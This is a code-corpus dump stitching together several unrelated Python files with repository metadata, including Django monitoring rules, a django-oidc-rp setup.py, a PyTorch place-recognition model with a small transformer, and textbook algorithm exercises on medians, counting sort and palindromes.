return FoundationDBBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
return VictoriaMetricsBackendPlugin
raise Exception()
def clean(self):
super(MachineMetricRule, self).clean()
if self.resource_model_name != 'machine':
raise me.ValidationError(
'Invalid resource type "%s". %s can only operate on machines' %
(self.resource_model_name, self.__class__.__name__))
class NoDataRule(MachineMetricRule):
_controller_cls = NoDataRuleController
@property
def _backend_plugin(self):
if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
return GraphiteNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
return InfluxDBNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
return FoundationDBNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
return VictoriaMetricsNoDataPlugin
raise Exception()
# FIXME All following properties are for backwards compatibility.
# However, this rule is not meant to match any queries, but to be
# used internally, thus the `None`s.
@property
def metric(self):
return None
@property
def operator(self):
return None
@property
def value(self):
return None
@property
def aggregate(self):
return None
@property
def reminder_offset(self):
return None
@property
def action(self):
return ''
class ResourceLogsRule(ResourceRule):
_data_type_str = 'logs'
_backend_plugin = ElasticSearchBackendPlugin
class ArbitraryLogsRule(ArbitraryRule):
_data_type_str = 'logs'
_backend_plugin = ElasticSearchBackendPlugin
def _populate_rules():
"""Populate RULES with mappings from rule type to rule subclass.
RULES is a mapping (dict) from rule types to subclasses of Rule.
A rule's type is the concat of two strings: <str1>-<str2>, where
str1 denotes whether the rule is arbitrary or not and str2 equals
the `_data_type_str` class attribute of the rule, which is simply
the type of the requesting data, like logs or monitoring metrics.
The aforementioned concatenation is simply a way to categorize a
rule, such as saying a rule on arbitrary logs or a resource-bound
rule referring to the monitoring data of machine A.
"""
public_rule_map = {}
hidden_rule_cls = (ArbitraryRule, ResourceRule, NoDataRule, )
for key, value in list(globals().items()):
if not key.endswith('Rule'):
continue
if value in hidden_rule_cls:
continue
if not issubclass(value, (ArbitraryRule, ResourceRule, )):
continue
str1 = 'resource' if issubclass(value, ResourceRule) else 'arbitrary'
rule_key = '%s-%s' % (str1, value._data_type_str)
public_rule_map[rule_key] = value
return public_rule_map
RULES = _populate_rules()
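# For illustration, given the classes above the resulting mapping is expected
# to contain exactly these public entries (NoDataRule and the abstract base
# classes are deliberately excluded by _populate_rules):
#
#   RULES == {
#       'resource-metrics': MachineMetricRule,
#       'resource-logs': ResourceLogsRule,
#       'arbitrary-logs': ArbitraryLogsRule,
#   }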
| 35.155102
| 79
| 0.673981
| 14,731
| 0.855161
| 0
| 0
| 4,875
| 0.283002
| 0
| 0
| 7,951
| 0.46157
|
428d613a4c439197af5e225dec64ebdd98da7d00
| 1,685
|
py
|
Python
|
setup.py
|
andrewwhitehead/django-oidc-rp
|
233f1daeef96dbe84ecbb37fa31393c84f9c2805
|
[
"MIT"
] | 20
|
2018-04-16T13:17:35.000Z
|
2021-06-05T00:08:33.000Z
|
setup.py
|
andrewwhitehead/django-oidc-rp
|
233f1daeef96dbe84ecbb37fa31393c84f9c2805
|
[
"MIT"
] | 9
|
2018-07-20T18:19:13.000Z
|
2021-12-22T08:57:18.000Z
|
setup.py
|
bcgov/django-oidc-rp
|
50e6fa143e61b04849b4c66beef078be0d7669de
|
[
"MIT"
] | 21
|
2018-07-10T16:05:44.000Z
|
2022-01-24T05:57:09.000Z
|
# -*- coding: utf-8 -*-
import codecs
from os.path import abspath
from os.path import dirname
from os.path import join
from setuptools import find_packages
from setuptools import setup
import oidc_rp
def read_relative_file(filename):
""" Returns contents of the given file, whose path is supposed relative to this module. """
with codecs.open(join(dirname(abspath(__file__)), filename), encoding='utf-8') as f:
return f.read()
setup(
name='django-oidc-rp',
version=oidc_rp.__version__,
author='impak Finance',
author_email='tech@impakfinance.com',
packages=find_packages(exclude=['tests.*', 'tests']),
include_package_data=True,
url='https://github.com/impak-finance/django-oidc-rp',
license='MIT',
description='A server side OpenID Connect Relying Party (RP/Client) implementation for Django.',
long_description=read_relative_file('README.rst'),
keywords='django openidconnect oidc client rp authentication auth',
zip_safe=False,
install_requires=[
'django>=1.11',
'jsonfield2',
'pyjwkest>=1.4',
'requests>2.0',
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| 31.792453
| 100
| 0.648071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.51276
|
428e0c3390f490eb7e09d675c22baad9bedb5ba6
| 171
|
py
|
Python
|
nndet/evaluator/detection/__init__.py
|
joeranbosma/nnDetection
|
2ebbf1cdc8a8794c73e325f06fea50632c78ae8c
|
[
"BSD-3-Clause"
] | 242
|
2021-05-17T12:31:39.000Z
|
2022-03-31T11:51:29.000Z
|
nndet/evaluator/detection/__init__.py
|
joeranbosma/nnDetection
|
2ebbf1cdc8a8794c73e325f06fea50632c78ae8c
|
[
"BSD-3-Clause"
] | 59
|
2021-06-02T07:32:10.000Z
|
2022-03-31T18:45:52.000Z
|
nndet/evaluator/detection/__init__.py
|
joeranbosma/nnDetection
|
2ebbf1cdc8a8794c73e325f06fea50632c78ae8c
|
[
"BSD-3-Clause"
] | 38
|
2021-05-31T14:01:37.000Z
|
2022-03-21T08:24:40.000Z
|
from nndet.evaluator.detection.froc import FROCMetric
from nndet.evaluator.detection.coco import COCOMetric
from nndet.evaluator.detection.hist import PredictionHistogram
| 42.75
| 62
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
428e40b791a018156767a64f9f6283399ebd2b1c
| 289
|
py
|
Python
|
tests/test_update.py
|
sosie-js/ankisync2
|
a41580197eab7f180f02a38a4aa912eb54cfaa93
|
[
"MIT"
] | 39
|
2020-02-12T23:41:24.000Z
|
2022-02-28T15:46:23.000Z
|
tests/test_update.py
|
sosie-js/ankisync2
|
a41580197eab7f180f02a38a4aa912eb54cfaa93
|
[
"MIT"
] | 9
|
2019-08-02T18:25:07.000Z
|
2022-02-07T23:14:43.000Z
|
tests/test_update.py
|
sosie-js/ankisync2
|
a41580197eab7f180f02a38a4aa912eb54cfaa93
|
[
"MIT"
] | 6
|
2019-09-09T14:27:48.000Z
|
2021-08-31T08:13:00.000Z
|
# from ankisync2.apkg import Apkg, db
# Has to be done through normal database methods
# def test_update():
# apkg = Apkg("example1.apkg")
# for n in db.Notes.filter(db.Notes.data["field1"] == "data1"):
# n.data["field3"] = "data2"
# n.save()
# apkg.close()
| 24.083333
| 67
| 0.598616
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.961938
|
428eac96b1905cf94fc5b1f167e60c8c46762f48
| 16,931
|
py
|
Python
|
lib/place_model.py
|
ihaeyong/drama-graph
|
60c3c216cd74bb19efd6baf836f6c7c2b42b764f
|
[
"MIT"
] | 3
|
2021-04-28T07:19:39.000Z
|
2022-03-07T09:34:19.000Z
|
lib/place_model.py
|
ihaeyong/drama-graph
|
60c3c216cd74bb19efd6baf836f6c7c2b42b764f
|
[
"MIT"
] | 18
|
2020-08-24T12:40:38.000Z
|
2022-03-12T00:47:14.000Z
|
lib/place_model.py
|
ihaeyong/drama-graph
|
60c3c216cd74bb19efd6baf836f6c7c2b42b764f
|
[
"MIT"
] | 1
|
2020-10-15T10:09:20.000Z
|
2020-10-15T10:09:20.000Z
|
import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
def label_mapping(target):
temp = []
for idx in range(len(target)):
if target[idx][0][:3] == 'con':
target[idx][0] = 'convenience store'
temp.append(label_dict[target[idx][0]])
return temp
def label_remapping(target):
inv_label_dict = {v: k for k, v in label_dict_wo_none.items()}
temp = []
for idx in range(len(target)):
temp.append(inv_label_dict[target[idx]])
return temp
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
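# Example (illustrative): with output = [[0.1, 0.2, 0.7], [0.8, 0.1, 0.1]] and
# target = [2, 0], accuracy(output, target, topk=(1,)) returns [tensor([100.])]
# because both top-1 predictions match their targets.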
def place_buffer(images_norm, buffer_images):
if len(buffer_images) == 0:
buffer_images = images_norm
if len(buffer_images) < 10:
for idx in range(10-len(buffer_images)):
buffer_images = [images_norm[0]] + buffer_images
assert len(buffer_images) == 10, 'Buffer failed'
return buffer_images
class AverageMeter(object):
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]
def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
labels: A int tensor of size [batch].
logits: A float tensor of size [batch, no_of_classes].
samples_per_cls: A python list of size [no_of_classes].
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
effective_num = 1.0 - np.power(beta, samples_per_cls)
weights = (1.0 - beta) / np.array(effective_num)
weights = weights / np.sum(weights) * no_of_classes
labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()
weights = torch.tensor(weights).float()
weights = weights.unsqueeze(0)
weights = weights.repeat(labels_one_hot.shape[0],1) * labels_one_hot
weights = weights.sum(1)
weights = weights.unsqueeze(1)
weights = weights.repeat(1,no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
elif loss_type == "sigmoid":
        cb_loss = F.binary_cross_entropy_with_logits(input=logits, target=labels_one_hot.cuda(), weight=weights.cuda())
elif loss_type == "softmax":
pred = logits.softmax(dim = 1)
cb_loss = F.binary_cross_entropy(input = pred, target = labels_one_hot.cuda(), weight = weights.cuda())
return cb_loss
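# Worked example (illustrative): with beta = 0.99 and two classes holding 10
# and 1000 samples, the effective numbers are 1 - 0.99**10 ~= 0.0956 and
# 1 - 0.99**1000 ~= 0.99996, so before renormalization the rare class gets a
# weight roughly 10x that of the common class (1/0.0956 vs. 1/0.99996).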
def focal_loss(labels, logits, alpha, gamma):
"""Compute the focal loss between `logits` and the ground truth `labels`.
Focal loss = -alpha_t * (1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
pt = p (if true class), otherwise pt = 1 - p. p = sigmoid(logit).
Args:
labels: A float tensor of size [batch, num_classes].
logits: A float tensor of size [batch, num_classes].
alpha: A float tensor of size [batch_size]
specifying per-example weight for balanced cross entropy.
gamma: A float scalar modulating loss from hard and easy examples.
Returns:
focal_loss: A float32 scalar representing normalized total loss.
"""
BCLoss = F.binary_cross_entropy_with_logits(input = logits, target = labels,reduction = "none")
if gamma == 0.0:
modulator = 1.0
else:
modulator = torch.exp(-gamma * labels * logits - gamma * torch.log(1 +
torch.exp(-1.0 * logits)))
loss = modulator * BCLoss
weighted_loss = alpha * loss
focal_loss = torch.sum(weighted_loss)
focal_loss /= torch.sum(labels)
return focal_loss
class place_model(nn.Module):
def __init__(self, num_persons, num_faces, device):
super(place_model, self).__init__()
pre_model = Yolo(num_persons).cuda(device)
num_face_cls = num_faces
self.detector = YoloD(pre_model).cuda(device)
self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
self.avgpool = nn.AvgPool2d(7, stride=1)
# self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
# self.bert_fc1 = torch.nn.Linear(128, 768)
# self.bert_fc2 = torch.nn.Linear(768, 128)
self.bert = BERT()
self.fc2 = torch.nn.Linear(128, 1)
self.fc3 = torch.nn.Linear(128, 22)
self.softmax = torch.nn.Softmax(dim=1)
# # define face
# self.face_conv = nn.Conv2d(
# 1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)
def forward(self, image):
        N, T, C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
image = image.reshape(N*T, C, H, W)
# feature map of backbone
fmap, output_1 = self.detector(image)
fmap = self.place_conv(fmap)
x = self.avgpool(fmap)
x = x.reshape(N, T, -1)
# self.lstm_sc.flatten_parameters()
# N, T = x.size(0), x.size(1)
# x = self.lstm_sc(x)[0]
# x = self.bert_fc1(x)
x = self.bert(x)
# x = self.bert_fc2(x)
change = x.reshape(N*T, -1)
#x = self.fc1(x)
change = self.fc2(change)
change = change.reshape(N, T)
#x = x.reshape(N*T, -1)
M, _ = change.max(1)
w = change - M.view(-1,1)
w = w.exp()
w = w.unsqueeze(1).expand(-1,w.size(1),-1)
w = w.triu(1) - w.tril()
w = w.cumsum(2)
w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
ww = w.new_empty(w.size())
idx = M>=0
ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
idx = ~idx
ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
ww = (ww+1e-10).pow(-1)
ww = ww/ww.sum(1,True)
x = ww.transpose(1,2).bmm(x)
x = x.reshape(N*T, -1)
x = self.fc3(x)
x = x.reshape(N*T, -1)
return x
class BERT(nn.Module):
"""
BERT model : Bidirectional Encoder Representations from Transformers.
"""
def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
"""
:param vocab_size: vocab_size of total words
:param hidden: BERT model hidden size
:param n_layers: numbers of Transformer blocks(layers)
:param attn_heads: number of attention heads
:param dropout: dropout rate
"""
super(BERT, self).__init__()
self.hidden = hidden
self.n_layers = n_layers
self.attn_heads = attn_heads
# paper noted they used 4*hidden_size for ff_network_hidden_size
self.feed_forward_hidden = hidden * 4
# embedding for BERT, sum of positional, segment, token embeddings
self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)
# multi-layers transformer blocks, deep network
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden, attn_heads, hidden * 4, dropout) for _ in range(n_layers)])
def forward(self, x):
# attention masking for padded token
# torch.ByteTensor([batch_size, 1, seq_len, seq_len])
# mask = (x > 0).unsqueeze(1).repeat(1, x.size(1), 1).unsqueeze(1)
# embedding the indexed sequence to sequence of vectors
x = self.embedding(x)
# running over multiple transformer blocks
for transformer in self.transformer_blocks:
# x = transformer.forward(x, mask)
x = transformer.forward(x, None)
return x
class BERTEmbedding(nn.Module):
"""
    BERT Embedding, composed of the following features:
        1. TokenEmbedding : normal embedding matrix
        2. PositionalEmbedding : adding positional information using sin, cos
        3. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
    The sum of all these features is the output of BERTEmbedding.
"""
def __init__(self, vocab_size, embed_size, dropout=0.):
"""
:param vocab_size: total vocab size
:param embed_size: embedding size of token embedding
:param dropout: dropout rate
"""
super(BERTEmbedding, self).__init__()
# self.token = TokenEmbedding(vocab_size=vocab_size, embed_size=embed_size)
# self.position = PositionalEmbedding(d_model=self.token.embedding_dim)
# self.segment = SegmentEmbedding(embed_size=self.token.embedding_dim)
self.position = PositionalEmbedding(d_model=embed_size)
self.dropout = nn.Dropout(p=dropout)
self.embed_size = embed_size
def forward(self, sequence):
# x = self.token(sequence) + self.position(sequence) + self.segment(segment_label)
x = sequence + self.position(sequence)
return self.dropout(x)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model, max_len=512):
super(PositionalEmbedding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model).float()
        pe.requires_grad = False
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = (torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model)).exp()
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
return self.pe[:, :x.size(1)]
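    # The buffer built in __init__ follows the sinusoidal scheme from
    # "Attention Is All You Need":
    #   PE(pos, 2i)   = sin(pos / 10000**(2i / d_model))
    #   PE(pos, 2i+1) = cos(pos / 10000**(2i / d_model))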
class TransformerBlock(nn.Module):
"""
Bidirectional Encoder = Transformer (self-attention)
Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
"""
def __init__(self, hidden, attn_heads, feed_forward_hidden, dropout):
"""
:param hidden: hidden size of transformer
:param attn_heads: head sizes of multi-head attention
:param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
:param dropout: dropout rate
"""
super(TransformerBlock, self).__init__()
self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
self.feed_forward = PositionwiseFeedForward(d_model=hidden, d_ff=feed_forward_hidden, dropout=dropout)
self.input_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.output_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.dropout = nn.Dropout(p=dropout)
def forward(self, x, mask):
x = self.input_sublayer(x, lambda _x: self.attention.forward(_x, _x, _x, mask=mask))
x = self.output_sublayer(x, self.feed_forward)
return self.dropout(x)
class MultiHeadedAttention(nn.Module):
"""
Take in model size and number of heads.
"""
def __init__(self, h, d_model, dropout=0.1):
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
self.output_linear = nn.Linear(d_model, d_model)
self.attention = Attention()
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
batch_size = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = [l(x).view(batch_size, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linear_layers, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
x, attn = self.attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)
return self.output_linear(x)
class Attention(nn.Module):
"""
Compute 'Scaled Dot Product Attention'
"""
def __init__(self):
super(Attention, self).__init__()
def forward(self, query, key, value, mask=None, dropout=None):
scores = torch.matmul(query, key.transpose(-2, -1))/math.sqrt(query.size(-1))
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
p_attn = F.softmax(scores, dim=-1)
if dropout is not None:
p_attn = dropout(p_attn)
return torch.matmul(p_attn, value), p_attn
class PositionwiseFeedForward(nn.Module):
"Implements FFN equation."
def __init__(self, d_model, d_ff, dropout=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
#self.activation = nn.GELU()
self.activation = nn.ReLU()
def forward(self, x):
return self.w_2(self.dropout(self.activation(self.w_1(x))))
class SublayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = nn.LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
| 36.647186
| 126
| 0.631268
| 11,071
| 0.653889
| 0
| 0
| 0
| 0
| 0
| 0
| 5,143
| 0.303762
|
428f4631d1d991fd823deb6aae84c7555b191363
| 9,127
|
py
|
Python
|
ch01/challenge.py
|
laszlokiraly/LearningAlgorithms
|
032a3cc409546619cf41220821d081cde54bbcce
|
[
"MIT"
] | null | null | null |
ch01/challenge.py
|
laszlokiraly/LearningAlgorithms
|
032a3cc409546619cf41220821d081cde54bbcce
|
[
"MIT"
] | null | null | null |
ch01/challenge.py
|
laszlokiraly/LearningAlgorithms
|
032a3cc409546619cf41220821d081cde54bbcce
|
[
"MIT"
] | null | null | null |
"""
Challenge Exercises for Chapter 1.
"""
import random
import timeit
from algs.table import DataTable, ExerciseNum, caption
from algs.counting import RecordedItem
def partition(A, lo, hi, idx):
"""
Partition using A[idx] as value. Note lo and hi are INCLUSIVE on both
ends and idx must be valid index. Count the number of comparisons
by populating A with RecordedItem instances.
"""
if lo == hi:
return lo
A[idx],A[lo] = A[lo],A[idx] # swap into position
i = lo
j = hi + 1
while True:
while True:
i += 1
if i == hi: break
if A[lo] < A[i]: break
while True:
j -= 1
if j == lo: break
if A[j] < A[lo]: break
# doesn't count as comparing two values
if i >= j: break
A[i],A[j] = A[j],A[i]
A[lo],A[j] = A[j],A[lo]
return j
def linear_median(A):
"""
Efficient implementation that returns median value in arbitrary list,
assuming A has an odd number of values. Note this algorithm will
rearrange values in A.
"""
# if len(A) % 2 == 0:
# raise ValueError('linear_median() only coded to work with odd number of values.')
lo = 0
hi = len(A) - 1
mid = hi // 2
while lo < hi:
idx = random.randint(lo, hi) # select valid index randomly
j = partition(A, lo, hi, idx)
if j == mid:
return A[j]
if j < mid:
lo = j+1
else:
hi = j-1
return A[lo]
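# Example (illustrative): linear_median([5, 1, 4, 2, 3]) returns 3; note that
# the input list is rearranged in place by the partition steps.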
def median_from_sorted_list(A):
sorted_A = sorted(A)
len_A = len(A)
if len_A % 2 == 0:
return (sorted_A[(len_A//2) - 1] + sorted_A[len_A//2]) / 2
else:
return sorted_A[len_A//2]
def counting_sort(A, M):
"""
Update A in place to be sorted in ascending order if all elements
    are guaranteed to be in the range 0 up to, but not including, M.
"""
counts = [0] * M
for v in A:
counts[v] += 1
pos = 0
v = 0
while pos < len(A):
for idx in range(counts[v]):
A[pos+idx] = v
pos += counts[v]
v += 1
def counting_sort_improved(A,M):
"""
Update A in place to be sorted in ascending order if all elements
    are guaranteed to be in the range 0 up to, but not including, M.
"""
counts = [0] * M
for val in A:
counts[val] += 1
pos = 0
val = 0
while pos < len(A):
if counts[val] > 0:
A[pos:pos+counts[val]] = [val] * counts[val]
pos += counts[val]
val += 1
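# Worked example (illustrative): for A = [2, 0, 1, 2, 0] and M = 3 the counts
# are [2, 1, 2], so the slices written back are [0]*2, [1]*1, [2]*2, giving
# A = [0, 0, 1, 2, 2].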
def run_counting_sort_trials(max_k=15, output=True):
"""Generate table for counting sort up to (but not including) max_k=15."""
tbl = DataTable([8,15,15],
['N', 'counting_sort', 'counting_sort_improved'], output=output)
M = 20 # arbitrary value, and results are dependent on this value.
trials = [2**k for k in range(8, max_k)]
for n in trials:
t_cs = min(timeit.repeat(stmt='counting_sort(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
t_csi = min(timeit.repeat(stmt='counting_sort_improved(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort_improved
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
tbl.row([n, t_cs, t_csi])
return tbl
def run_median_trial():
"""Generate table for Median Trial."""
tbl = DataTable([10,15,15],['N', 'median_time', 'sort_median'])
trials = [2**k+1 for k in range(8,20)]
for n in trials:
t_med = 1000*min(timeit.repeat(stmt='assert(linear_median(a) == {}//2)'.format(n),
setup='''
import random
from ch01.challenge import linear_median
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
t_sort = 1000*min(timeit.repeat(stmt='assert(median_from_sorted_list(a) == {0}//2)'.format(n),
setup='''
import random
from ch01.challenge import median_from_sorted_list
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
tbl.row([n, t_med, t_sort])
return tbl
def run_median_less_than_trial(max_k=20, output=True):
"""Use RecordedItem to count # of times Less-than invoked up to (but not including) max_k=20."""
tbl = DataTable([10,15,15],['N', 'median_count', 'sort_median_count'], output=output)
tbl.format('median_count', ',d')
tbl.format('sort_median_count', ',d')
trials = [2**k+1 for k in range(8, max_k)]
for n in trials:
A = list([RecordedItem(i) for i in range(n)])
random.shuffle(A)
        # Compute the sorted-list median first so the same shuffled list can be reused
RecordedItem.clear()
med2 = median_from_sorted_list(A)
sort_lt = RecordedItem.report()[1]
RecordedItem.clear()
med1 = linear_median(A)
lin_lt = RecordedItem.report()[1]
assert med1 == med2
tbl.row([n, lin_lt, sort_lt])
return tbl
def is_palindrome1(w):
"""Create slice with negative step and confirm equality with w."""
return w[::-1] == w
def is_palindrome2(w):
"""Strip outermost characters if same, return false when mismatch."""
while len(w) > 1:
if w[0] != w[-1]: # if mismatch, return False
return False
w = w[1:-1] # strip characters on either end; repeat
return True # must have been a Palindrome
def is_palindrome3(w):
"""iterate from start and from end and compare, without copying arrays"""
for i in range(0,round(len(w)/2)):
if w[i] != w[-(i+1)]:
return False
return True # must have been a Palindrome
def is_palindrome_letters_only(s):
"""
Confirm Palindrome, even when string contains non-alphabet letters
and ignore capitalization.
casefold() method, which was introduced in Python 3.3, could be
used instead of this older method, which converts to lower().
"""
i = 0
j = hi = len(s) - 1
while i < j:
# This type of logic appears in partition.
# Find alpha characters and compare
while not s[i].isalpha():
i += 1
if i == hi: break
while not s[j].isalpha():
j -= 1
if j == 0: break
if s[i].lower() != s[j].lower(): return False
i += 1
j -= 1
return True
def tournament_allows_odd(A):
"""
Returns two largest values in A. Works for odd lists
"""
from ch01.largest_two import Match
if len(A) < 2:
raise ValueError('Must have at least two values')
tourn = []
for i in range(0, len(A)-1, 2):
tourn.append(Match(A[i], A[i+1]))
odd_one_out = None
if len(A) % 2 == 1:
odd_one_out = A[-1]
while len(tourn) > 1:
tourn.append(Match.advance(tourn[0], tourn[1]))
del tourn[0:2]
# Find where second is hiding!
m = tourn[0]
largest = m.larger
second = m.smaller
# Wait until the end, and see where it belongs
if odd_one_out:
if odd_one_out > largest:
largest,second = odd_one_out,largest
elif odd_one_out > second:
second = odd_one_out
while m.prior:
m = m.prior
if second < m.smaller:
second = m.smaller
return (largest,second)
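# Example (illustrative, assuming ch01.largest_two.Match semantics): for
# A = [3, 1, 4, 1, 5] the pairs (3,1) and (4,1) play off to leave 4 as the
# provisional winner; the odd value 5 is folded in at the end, so the
# function returns (5, 4).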
def two_largest_attempt(A):
"""Failed attempt to implement two largest."""
m1 = max(A[:len(A)//2])
m2 = max(A[len(A)//2:])
if m1 < m2:
return (m2, m1)
return (m1, m2)
#######################################################################
if __name__ == '__main__':
chapter = 1
with ExerciseNum(1) as exercise_number:
sample = 'A man, a plan, a canal. Panama!'
print(sample,'is a palindrome:', is_palindrome_letters_only(sample))
print(caption(chapter, exercise_number),
'Palindrome Detector')
with ExerciseNum(2) as exercise_number:
run_median_less_than_trial()
print()
run_median_trial()
print(caption(chapter, exercise_number),
'Median Counting')
with ExerciseNum(3) as exercise_number:
run_counting_sort_trials()
print(caption(chapter, exercise_number),
'Counting Sort Trials')
with ExerciseNum(4) as exercise_number:
